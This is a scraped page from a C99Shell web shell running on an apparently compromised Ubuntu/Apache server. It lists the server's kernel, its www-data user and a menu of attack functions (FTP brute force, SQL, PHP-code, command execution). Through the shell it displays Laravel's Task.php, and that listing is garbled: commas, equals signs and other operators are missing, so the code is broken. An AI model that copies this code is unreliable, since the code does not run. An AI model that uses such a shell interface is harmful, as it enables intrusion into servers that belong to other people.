!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/main_file/vendor/laravel/framework/src/Illuminate/Console/View/Components/   drwxr-xr-x
Free 13.05 GB of 57.97 GB (22.51%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Task.php (1.77 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Illuminate\Console\View\Components;

use 
Symfony\Component\Console\Output\OutputInterface;
use function 
Termwind\terminal;
use 
Throwable;

class 
Task extends Component
{
    
/**
     * Renders the component using the given arguments.
     *
     * @param  string  $description
     * @param  (callable(): bool)|null  $task
     * @param  int  $verbosity
     * @return void
     */
    
public function render($description$task null$verbosity OutputInterface::VERBOSITY_NORMAL)
    {
        
$description $this->mutate($description, [
            
Mutators\EnsureDynamicContentIsHighlighted::class,
            
Mutators\EnsureNoPunctuation::class,
            
Mutators\EnsureRelativePaths::class,
        ]);

        
$descriptionWidth mb_strlen(preg_replace("/\<[\w=#\/\;,:.&,%?]+\>|\\e\[\d+m/"'$1'$description) ?? '');

        
$this->output->write("  $description "false$verbosity);

        
$startTime microtime(true);

        
$result false;

        try {
            
$result = ($task ?: fn () => true)();
        } catch (
Throwable $e) {
            throw 
$e;
        } finally {
            
$runTime $task
                
? (' '.number_format((microtime(true) - $startTime) * 1000).'ms')
                : 
'';

            
$runTimeWidth mb_strlen($runTime);
            
$width min(terminal()->width(), 150);
            
$dots max($width $descriptionWidth $runTimeWidth 100);

            
$this->output->write(str_repeat('<fg=gray>.</>'$dots), false$verbosity);
            
$this->output->write("<fg=gray>$runTime</>"false$verbosity);

            
$this->output->writeln(
                
$result !== false ' <fg=green;options=bold>DONE</>' ' <fg=red;options=bold>FAIL</>',
                
$verbosity,
            );
        }
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0245 ]--